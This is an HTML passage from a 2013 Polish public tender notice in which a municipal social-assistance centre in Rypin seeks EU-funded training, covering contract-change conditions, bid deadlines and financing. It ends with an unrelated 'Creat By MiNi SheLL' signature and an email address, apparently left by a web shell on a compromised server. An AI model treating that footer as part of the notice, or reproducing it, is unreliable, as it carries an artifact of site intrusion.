c) konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej;
d) konieczność wprowadzenia zmian będzie następstwem zmian organizacyjnych po stronie Zamawiającego;
e) z powodu okoliczności siły wyższej, np.: wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć w chwili zawarcia umowy;
f) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
g) zaistnieją okoliczności niezależne od Zamawiającego i Wykonawcy uzasadniające zmianę terminów realizacji przedmiotu umowy,
i) zaistnieją okoliczności niezależne od Zamawiającego i Wykonawcy, uzasadniające zmianę miejsca realizacji szkoleń, przy czym zmiana nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w Załączniku nr 1 do SIWZ Opis przedmiotu zamówienia

2. Zamawiający dopuszcza zmianę osoby-osób prowadzącej-ych szkolenia w toku realizacji zamówienia, ale jedynie w uzasadnionych przypadkach, w szczególności na wypadek choroby lub innej okoliczności uniemożliwiającej osobie prowadzącej szkolenia wykonywanie obowiązków wynikających z umowy. Zmiana osoby prowadzącej szkolenia jest dopuszczalna pod warunkiem, że wskazana osoba (zastępca) posiada co najmniej takie same kwalifikacje zawodowe i co najmniej takie samo doświadczenie zawodowe jak osoba wskazana w ofercie Wykonawcy.

3.W przypadku obiektywnie pojawiających się okoliczności Zamawiający dopuszcza zmianę ilości osób w poszczególnych szkoleniach. Przy czym Zamawiający zastrzega, że ogólna ilość osób przewidywana do objęcia wsparciem w formie szkoleń, zgodnie z Załącznikiem nr 1 (tj. łącznie 27 osób) nie ulegnie zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.rypin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Rypinie, ul. Lipnowska 4, 87 - 500 Rypin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2013 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Rypinie, ul. Lipnowska 4, 87 - 500 Rypin, parter, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com